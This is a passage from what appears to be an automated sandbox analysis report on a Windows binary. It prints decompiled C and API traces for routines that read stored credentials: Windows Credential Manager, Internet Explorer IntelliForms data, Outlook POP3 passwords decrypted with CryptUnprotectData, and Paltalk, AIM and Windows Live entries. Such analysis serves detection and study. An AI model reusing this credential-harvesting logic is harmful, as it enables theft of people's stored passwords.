				_t9 = FormatMessageA(_t12, _t8, _t22, 0x400,  &_v8, 0, 0);
				if(_t9 <= 0) {
					0x413d0c(_a4, "Unknown Error");
				} else {
					if(strlen(_v8) < 0x400) {
						0x413d0c(_a4, _v8);
					}
					_t9 = LocalFree(_v8);
				}
				return _t9;
			}

0x00406735
0x00406743
0x0040674b
0x00406750
0x0040675a
0x00406762
0x00406764
0x00406764
0x00406762
0x00406778
0x00406780
0x004067af
0x00406782
0x0040678d
0x00406795
0x0040679b
0x0040679f
0x0040679f
0x004067b9

APIs

LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 0040675A
FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406778
strlen.MSVCRT ref: 00406785
_mbscpy.MSVCRT ref: 00406795
LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 0040679F
_mbscpy.MSVCRT ref: 004067AF

Strings

Unknown Error, xrefs: 004067A7
netmsg.dll, xrefs: 00406755

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
String ID: Unknown Error$netmsg.dll
API String ID: 2881943006-572158859
Opcode ID: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
Instruction ID: dfc2e55caf94d9be92a05a02ea8e3c4f3bcfe7ce6760d4d77d664b9d120d38b6
Opcode Fuzzy Hash: 6c5198025c4bc101f62493cbe4ad8011c35f98b5ff5852a1443cd9ba15c7a2da
Instruction Fuzzy Hash: F1014731600210BBDB152B60FD46EDF7F2CDF44B95F20403AF602B6090DA385E50C69C

Uniqueness

Uniqueness Score: -1.00%

Function 00404109, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404109(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;
				struct HINSTANCE__** _t19;

				_t19 = __eax;
				E00404170(__eax);
				_t10 = LoadLibraryA("advapi32.dll");
				 *_t19 = _t10;
				if(_t10 != 0) {
					_t19[2] = GetProcAddress(_t10, "CredReadW");
					_t19[3] = GetProcAddress( *_t19, "CredFree");
					_t14 = GetProcAddress( *_t19, "CredEnumerateW");
					_t19[4] = _t14;
					if(_t19[2] == 0 || _t19[3] == 0 || _t14 == 0) {
						E00404170(_t19);
					} else {
						_t19[1] = 1;
					}
				}
				return _t19[1];
			}

0x0040410a
0x0040410c
0x00404116
0x0040411e
0x00404120
0x00404138
0x00404144
0x00404147
0x0040414d
0x00404151
0x00404166
0x0040415d
0x0040415d
0x0040415d
0x00404151
0x0040416f

APIs

Part of subcall function 00404170: FreeLibrary.KERNEL32(?,00404111,00000000,0040FFAB,7614F420), ref: 00404177

LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,7614F420,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147

Strings

advapi32.dll, xrefs: 00404111
CredReadW, xrefs: 00404129
CredFree, xrefs: 00404131
CredEnumerateW, xrefs: 0040413D

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: CredEnumerateW$CredFree$CredReadW$advapi32.dll
API String ID: 2449869053-331516685
Opcode ID: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
Instruction ID: 12efa8cab8f3f54fa256443a021a4d85af4a352dd089a4683602f903f3396d9b
Opcode Fuzzy Hash: 521c868f04d398ed4da8af9e7a80e13fe4feb64e4d3800075c34db4e7e47eec4
Instruction Fuzzy Hash: E7F0FFB06087009AD770AF75DC09B97BAF4AFD8700B25883FE195A6690D77DE8C1CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040955A, Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E0040955A(void* __eax, void* __eflags, signed int _a4, short _a8) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t96;
				signed int _t98;
				void* _t99;
				signed int _t104;
				signed short _t107;
				signed int _t110;
				intOrPtr _t114;
				signed int _t117;
				signed int _t119;
				signed short _t121;
				signed int _t122;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				signed int _t161;
				signed int _t163;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t178;
				intOrPtr _t180;

				_t174 = __eflags;
				_t172 = __eax;
				E00409370(__eax);
				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
				_t122 = 5;
				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
				_t156 = 0x14;
				_t96 = _t122 * _t156;
				 *(_t172 + 0x1b0) = _t122;
				0x413d5c( ~(0 | _t174 > 0x00000000) | _t96);
				 *(_t172 + 0x1b4) = _t96;
				_t158 = 0x10;
				_t98 = _t122 * _t158;
				0x413d5c( ~(0 | _t174 > 0x00000000) | _t98);
				 *(_t172 + 0x34) = _t98;
				_v8 = 0x41b8d8;
				do {
					_t99 = _v8;
					_t168 =  *_t99;
					_v12 = _t168;
					_t169 = _t168 * 0x14;
					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
					_t104 = _v12 << 4;
					_v12 = _t104;
					memcpy( *(_t172 + 0x34) + _t104, _v8 + 0x14, 0x10);
					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
					_t173 = _t173 + 0x18;
					_v16 = _t107;
					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
					if((_t107 & 0xffff0000) == 0) {
						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E0040876F(_t107 & 0x0000ffff);
						_t121 = E0040876F(_v16 | 0x00010000);
						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
						_t122 = 5;
					}
					_v8 = _v8 + 0x24;
					_t178 = _v8 - 0x41b98c;
				} while (_t178 < 0);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
				_t161 = 4;
				_t110 = _t122 * _t161;
				 *(_t172 + 0x20) = _t122;
				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
				0x413d5c( ~(0 | _t178 > 0x00000000) | _t110);
				 *(_t172 + 0x24) = _t110;
				0x413d5c(0xc);
				_t170 = _t110;
				if(_t170 == 0) {
					_t170 = 0;
					__eflags = 0;
				} else {
					_t114 =  *((intOrPtr*)(_t172 + 0x48));
					_t180 = _t114;
					_a8 = _t114;
					if(_t180 == 0) {
						_a8 = 0x64;
					}
					 *((intOrPtr*)(_t170 + 8)) = _a4;
					_t163 = 4;
					_t117 = _t122 * _t163;
					 *(_t170 + 4) = _t122;
					0x413d5c( ~(0 | _t180 > 0x00000000) | _t117);
					_a4 = _a4 & 0x00000000;
					 *_t170 = _t117;
					do {
						_t152 = _a4;
						_t119 = _t152 << 2;
						_a4 = _a4 + 1;
						 *( *_t170 + _t119 + 2) = _t152;
						 *((short*)(_t119 +  *_t170)) = _a8;
					} while (_a4 < _t122);
				}
				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
				 *(_t172 + 0x1a0) = _t170;
				 *((intOrPtr*)(_t172 + 0x40)) = 1;
				 *((intOrPtr*)(_t172 + 0x198)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
				return E004094DA(_t172);
			}

0x0040955a
0x00409563
0x00409565
0x0040956d
0x00409573
0x00409574
0x0040957e
0x00409581
0x00409586
0x00409591
0x00409596
0x004095a0
0x004095a3
0x004095ad
0x004095b4
0x004095b7
0x004095be
0x004095be
0x004095c1
0x004095c3
0x004095c6
0x004095d5
0x004095e9
0x004095ef
0x004095f2
0x004095fd
0x00409607
0x0040960f
0x00409612
0x00409616
0x0040962f
0x00409633
0x00409640
0x00409644
0x00409644
0x00409645
0x00409649
0x00409649
0x00409659
0x0040965d
0x00409664
0x00409667
0x0040966c
0x0040966f
0x0040967b
0x00409682
0x00409685
0x0040968a
0x00409690
0x004096ec
0x004096ec
0x00409692
0x00409692
0x00409695
0x00409697
0x0040969a
0x0040969c
0x0040969c
0x004096a6
0x004096ad
0x004096b0
0x004096b5
0x004096bd
0x004096c2
0x004096c7
0x004096c9
0x004096c9
0x004096d0
0x004096d3
0x004096d9
0x004096e4
0x004096e4
0x004096ea
0x004096ee
0x004096f8
0x00409700
0x00409703
0x00409709
0x0040970f
0x00409715
0x00409728

APIs

Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB

??2@YAPAXI@Z.MSVCRT ref: 00409591
??2@YAPAXI@Z.MSVCRT ref: 004095AD
memcpy.MSVCRT ref: 004095D5
memcpy.MSVCRT ref: 004095F2
??2@YAPAXI@Z.MSVCRT ref: 0040967B
??2@YAPAXI@Z.MSVCRT ref: 00409685
??2@YAPAXI@Z.MSVCRT ref: 004096BD

Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,00000FFF,?), ref: 00408838
Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877

Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808

Strings

d, xrefs: 0040969C
$, xrefs: 00409645

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
String ID: $$d
API String ID: 2915808112-2066904009
Opcode ID: 83977fa4547c2105a15e70559c2e4334156e97c5c74def1868066ed2ae587b6c
Instruction ID: c86123869de2e32e5bed1250838fccac9115591d6117e5efa9fb73667f4d6fb1
Opcode Fuzzy Hash: 83977fa4547c2105a15e70559c2e4334156e97c5c74def1868066ed2ae587b6c
Instruction Fuzzy Hash: D8514971A01704AFDB24DF29D582BAAB7F4FF48314F10852EE55ADB292DB74E9408F44

Uniqueness

Uniqueness Score: -1.00%

Function 00411356, Relevance: 13.6, APIs: 9, Instructions: 142COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004107B0,00000000,00000000), ref: 0041138D
EnumProcessModules.PSAPI(00000000,?,00004000,004107B0,?,004107B0,00000000,00000000), ref: 004113AF
memset.MSVCRT ref: 004113EA
memset.MSVCRT ref: 004113FC
GetModuleFileNameExA.PSAPI(00000000,?,?,00000104,00000000,00000104), ref: 00411429

Part of subcall function 00411172: _mbscpy.MSVCRT ref: 00411198

GetModuleInformation.PSAPI(00000000,?,?,0000000C), ref: 0041144F
memset.MSVCRT ref: 004114E3
_mbscpy.MSVCRT ref: 00411508
CloseHandle.KERNEL32(00000000,004107B0,?), ref: 00411552

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$ModuleProcess_mbscpy$CloseEnumFileHandleInformationModulesNameOpen
String ID:
API String ID: 3697563772-0
Opcode ID: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
Instruction ID: 2b4e81a65471dd6bda77e3e7a539d18b8ecf8660f8cea3ab0205070076e1852f
Opcode Fuzzy Hash: 745c210aaaa6b85eaae148b780003da6f3cf09640a074c35b8bdb1d56aff2f36
Instruction Fuzzy Hash: 5F511FB1D00218ABDF10DF95DC85ADEBBB9EF48704F0040A6E609A6251D7759FC0CF69

Uniqueness

Uniqueness Score: -1.00%

Function 004134D0, Relevance: 13.6, APIs: 9, Instructions: 61windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 004134D2
GetWindowLongA.USER32(00000000,000000EC), ref: 004134E4
GetWindowLongA.USER32(00000000,000000F0), ref: 004134EF
GetClassNameA.USER32(00000000,?,000003FF), ref: 00413505
GetWindowTextA.USER32(00000000,?,000003FF), ref: 00413511
GetWindowRect.USER32(00000000,?), ref: 0041351F
CopyRect.USER32(?,?), ref: 00413533
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00413541
SendMessageA.USER32(00000000,00000031,00000000,00000000), ref: 0041359A

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$LongRect$ClassCopyMessageNameParentPointsSendText
String ID:
API String ID: 2317770421-0
Opcode ID: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
Instruction ID: beb27d93b7d0259d1707648e93b0cb5b486bd7e44cd55be4178ee0c76b875b45
Opcode Fuzzy Hash: 7af2e41bf762aae8540d43ee514e8ccf414c9672fa24b186be0172eacc68f4a9
Instruction Fuzzy Hash: BF21A6B5500B01EFD7609F75DC88AD7BBEDFB88700F00CA2DA5AAD2254DA306541CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041244B, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0041247B
memcpy.MSVCRT ref: 004124A1
memcpy.MSVCRT ref: 004124B9

Strings

°, xrefs: 0041248E
<br>, xrefs: 004124B3
<, xrefs: 0041245C
>, xrefs: 00412468
", xrefs: 00412475
&, xrefs: 0041249B

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpy
String ID: &$°$>$<$"$<br>
API String ID: 3510742995-3273207271
Opcode ID: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
Instruction ID: f5a03e54b86e24f841f817b97e8ec33e4e13f45a83786b80a5cfcbc9bb1d817d
Opcode Fuzzy Hash: 13415ff2963e6dace8cd86106c59db4403270bd4b6c64038e468014c2b1c2be9
Instruction Fuzzy Hash: 0401DFB2EC465475EB3201093E4AFE72A4447B7B21F660667F589A0285E0DD0EF381BF

Uniqueness

Uniqueness Score: -1.00%

Function 00410205, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004102AA
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,7614F420,00000000), ref: 004102C3
_strnicmp.MSVCRT ref: 004102DF
WideCharToMultiByte.KERNEL32(00000000,00000000,00418AE0,000000FF,?,000000FF,00000000,00000000,?,?,?,?,7614F420,00000000), ref: 0041030D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,7614F420,00000000), ref: 0041032C

Strings

WindowsLive:name=*, xrefs: 00410227, 00410256
windowslive:name=, xrefs: 004102D9

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_strnicmpmemset
String ID: WindowsLive:name=*$windowslive:name=
API String ID: 2393399448-3589380929
Opcode ID: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
Instruction ID: 25a7ce4e34514ebc1ab433be8417aa6076f8fd68c633d2ab3a6fecdf2bbac582
Opcode Fuzzy Hash: 71b69f7c8173fc3aa574efd14f73b3720c8d0a19d14fe5437baa1e670a90085b
Instruction Fuzzy Hash: 59414DB190021EAFDB149F94DD849EEB7BCBF08304F1441AAE915A3251D774EEC4CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040821A, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040821A(void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				intOrPtr _v32;
				void _v287;
				char _v288;
				void* __esi;
				void** _t43;
				intOrPtr _t80;
				void* _t84;
				void* _t85;
				void* _t86;

				_t80 = _a4;
				_v32 = _t80 + 0x24;
				E0040733E(_t80 + 0x24);
				_t43 =  &_v20;
				0x411d68(0x80000001, "Software\Microsoft\Internet Explorer\IntelliForms\Storage2", _t43);
				_t85 = _t84 + 0xc;
				if(_t43 == 0) {
					_v16 = 0;
					_v24 = _t80 + 0x64;
					E0040746B(_t80 + 0x64, 0x2000);
					_v28 = 0;
					_v12 = 0xff;
					_v8 = 0x2000;
					_v288 = 0;
					memset( &_v287, 0, 0xff);
					_t86 = _t85 + 0xc;
					if(RegEnumValueA(_v20, 0,  &_v288,  &_v12, 0,  &_v28, E004074AA(_v24),  &_v8) != 0) {
						L4:
						return RegCloseKey(_v20);
					}
					_a4 = _a4 + 0x44;
					do {
						0x413df2( &_v288);
						E00407364(_v32,  &_v288, 0xffffffff);
						E00407364(_a4, E004074AA(_v24), _v8);
						_v16 = _v16 + 1;
						_v28 = 0;
						_v12 = 0xff;
						_v8 = 0x2000;
						_v288 = 0;
						memset( &_v287, 0, 0xff);
						_t86 = _t86 + 0xc;
					} while (RegEnumValueA(_v20, _v16,  &_v288,  &_v12, 0,  &_v28, E004074AA(_v24),  &_v8) == 0);
					goto L4;
				}
				return _t43;
			}

0x00408225
0x0040822b
0x0040822e
0x00408233
0x00408241
0x00408246
0x0040824b
0x0040825e
0x00408261
0x00408264
0x00408277
0x0040827a
0x0040827d
0x00408280
0x00408286
0x0040828b
0x004082b7
0x0040834c
0x00000000
0x00408355
0x004082c3
0x004082c6
0x004082cd
0x004082df
0x004082f3
0x004082f8
0x00408304
0x00408307
0x0040830a
0x0040830d
0x00408313
0x00408318
0x00408344
0x00000000
0x004082c6
0x00408359

APIs

Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407341
Part of subcall function 0040733E: ??3@YAXPAX@Z.MSVCRT ref: 00407349

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

Part of subcall function 0040746B: ??3@YAXPAX@Z.MSVCRT ref: 00407478

memset.MSVCRT ref: 00408286
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 004082AF
_strupr.MSVCRT ref: 004082CD

Part of subcall function 00407364: strlen.MSVCRT ref: 00407375
Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 00407398
Part of subcall function 00407364: ??3@YAXPAX@Z.MSVCRT ref: 004073BB
Part of subcall function 00407364: memcpy.MSVCRT ref: 004073DB

memset.MSVCRT ref: 00408313
RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,?), ref: 0040833E
RegCloseKey.ADVAPI32(?), ref: 0040834F

Strings

Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00408237

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@$EnumValuememset$CloseOpen_struprmemcpystrlen
String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 373939914-680441574
Opcode ID: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
Instruction ID: e14454ebfdff30ad66f99699cc9b695ae8a68f87cdcb03d8fe41683d15f76d0b
Opcode Fuzzy Hash: 595d46858c789d7861cec1ba9a6a44fece00a80f0e7bf05d1a4c71afb02c0405
Instruction Fuzzy Hash: 5141EDB2D0011DAFDB11DF99DC829DEBBBCAF14304F10406ABA05F2151E634AB45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00407A93, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 93
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00407A93(intOrPtr* _a4, void* _a8, intOrPtr _a12) {
				int _v12;
				int _v16;
				unsigned int _v20;
				int _v24;
				int _v28;
				char _v32;
				char* _v36;
				char _v40;
				char _v296;
				char _v552;
				char _v808;
				char _v1064;
				void _v2087;
				char _v2088;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t42;
				char* _t66;
				void* _t70;

				_v2088 = 0;
				memset( &_v2087, 0, 0x3ff);
				_v12 = 0x400;
				_v1064 = 0;
				_v808 = 0;
				_v552 = 0;
				_v296 = 0;
				_t42 = RegQueryValueExA(_a8, "POP3_credentials", 0,  &_v16,  &_v2088,  &_v12);
				_t74 = _t42;
				if(_t42 != 0) {
					return _t42;
				}
				_v32 = 0;
				_v24 = 0;
				_v28 = 0;
				if(E00404C9D( &_v32, _t74) != 0) {
					_v36 =  &_v2088;
					_v40 = _v12;
					if(E00404CF5( &_v32,  &_v40, 0,  &_v20) != 0) {
						 *((char*)(_t70 + WideCharToMultiByte(0, 0, _v16, _v20 >> 1,  &_v552, 0xfd, 0, 0) - 0x224)) = 0;
						LocalFree(_v16);
						0x411d82(_a8, "POP3_name");
						0x411d82(_a8, "POP3_host");
						_t66 =  &_v1064;
						E00406958(0xff, _t66, _a12);
						 *((intOrPtr*)( *_a4))(_t66);
					}
				}
				return E00404CE0( &_v32);
			}

0x00407aae
0x00407ab4
0x00407ad4
0x00407adb
0x00407ae1
0x00407ae7
0x00407aed
0x00407af3
0x00407af9
0x00407afb
0x00407bc3
0x00407bc3
0x00407b04
0x00407b07
0x00407b0a
0x00407b14
0x00407b20
0x00407b26
0x00407b3c
0x00407b60
0x00407b67
0x00407b82
0x00407b97
0x00407b9f
0x00407ba5
0x00407bb5
0x00407bb5
0x00407b3c
0x00000000

APIs

memset.MSVCRT ref: 00407AB4
RegQueryValueExA.ADVAPI32(?,POP3_credentials,00000000,?,?,?), ref: 00407AF3

Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FD,00000000,00000000,?,00000000,?), ref: 00407B57
LocalFree.KERNEL32(?), ref: 00407B67

Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B

Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972

Strings

POP3_name, xrefs: 00407B6D
POP3_credentials, xrefs: 00407ACC
POP3_host, xrefs: 00407B87

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrlen
String ID: POP3_credentials$POP3_host$POP3_name
API String ID: 2752996003-2190619648
Opcode ID: f9e0cc1d15b7ae483417ba89dbd2acaad5c80dd12f00609131e53948eb699b81
Instruction ID: 3c80738b82331245788ee24e24f692cafec0a237d8f87c7d6b462bdafe46d179
Opcode Fuzzy Hash: f9e0cc1d15b7ae483417ba89dbd2acaad5c80dd12f00609131e53948eb699b81
Instruction Fuzzy Hash: 9F312DB190121DAFDB11DF99DD81AEEBBBCEF48304F4040AAE955B3251D634AF448BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00410F07, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

memset.MSVCRT ref: 00410F48

Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11

memset.MSVCRT ref: 00410F92
RegCloseKey.ADVAPI32(?), ref: 00410FF6
RegCloseKey.ADVAPI32(?), ref: 0041101F

Strings

Software\Paltalk, xrefs: 00410F16
pwd, xrefs: 00410FBB
nickname, xrefs: 00410F97

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Closememset$EnumOpen
String ID: Software\Paltalk$nickname$pwd
API String ID: 1938129365-1014362899
Opcode ID: 371f017254c023b24f35e6f21b54137d424e2b90dbe38bf80ef2b31f4a61ba7b
Instruction ID: 96d414647358d9b2c810da9b3bce946d65dcecd18022e5434843d59e9988e6f9
Opcode Fuzzy Hash: 371f017254c023b24f35e6f21b54137d424e2b90dbe38bf80ef2b31f4a61ba7b
Instruction Fuzzy Hash: 7B3164B1D4011DAFDF11AB95DD42BEE7B7DAF18304F0000A6F604A2111D7399F95CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004044DE, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004044DE(char _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				int _t17;
				_Unknown_base(*)()* _t19;
				void* _t20;
				_Unknown_base(*)()* _t22;
				void* _t24;
				void* _t25;
				void* _t27;
				void* _t33;

				_v8 = _v8 & 0x00000000;
				_t17 =  &_v8;
				0x410daa(0xffffffff, 0xe,  &_v16);
				if(_t17 == 0) {
					L10:
					if(_v8 == 0) {
						return _t17;
					}
					return FreeLibrary(_v8);
				}
				_t25 = _v16;
				0x410d8a(_t33, _t24);
				if(_t17 == 0) {
					L9:
					_t17 = CloseHandle(_v16);
					goto L10;
				}
				_t19 = GetProcAddress(_v8, "DuplicateToken");
				if(_t19 != 0) {
					_t20 =  *_t19(_t25, 2,  &_v12);
					if(_t20 != 0) {
						_t27 = _v12;
						0x410d8a();
						if(_t20 != 0) {
							_t22 = GetProcAddress(_v8, "SetThreadToken");
							if(_t22 != 0) {
								 *_t22( &_a4, _t27);
							}
						}
						CloseHandle(_v12);
					}
				}
				goto L9;
			}

0x004044e4
0x004044f0
0x004044f3
0x004044fa
0x00404565
0x00404569
0x00404575
0x00404575
0x00000000
0x0040456e
0x004044fd
0x00404504
0x0040450b
0x0040455a
0x0040455d
0x00000000
0x00404564
0x0040451c
0x00404520
0x00404529
0x0040452d
0x0040452f
0x00404532
0x00404539
0x00404543
0x00404547
0x0040454e
0x0040454e
0x00404547
0x00404553
0x00404553
0x0040452d
0x00000000

APIs

Part of subcall function 00410DAA: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00410DC0

FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E

Part of subcall function 00410D8A: LoadLibraryA.KERNEL32(advapi32.dll,00410DB5,00000000,00000000,004044F8,000000FF,0000000E,?,?,0040428D), ref: 00410D94

GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
CloseHandle.KERNEL32(?), ref: 00404553
CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D

Strings

SetThreadToken, xrefs: 0040453B
DuplicateToken, xrefs: 00404514

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$CloseHandleLibrary$FreeLoad
String ID: DuplicateToken$SetThreadToken
API String ID: 3357505703-785560009
Opcode ID: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
Instruction ID: fb771c117c903999f7ab115302b4b85a9bfa7a6589c8aae05a31450a7ce75296
Opcode Fuzzy Hash: ead61f231025bced0a09c2f1fb3dd8adab68ce1b78bee45ece79c7bb5241faa8
Instruction Fuzzy Hash: D4113071900109FBDB10E7A5DD55EEE7B78AF84340F144176A611B10E1EB74DF44DA68

Uniqueness

Uniqueness Score: -1.00%

Function 00408FBC, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00408FBC(void* __eflags, intOrPtr _a4) {
				void* _t3;
				int _t4;
				void* _t10;
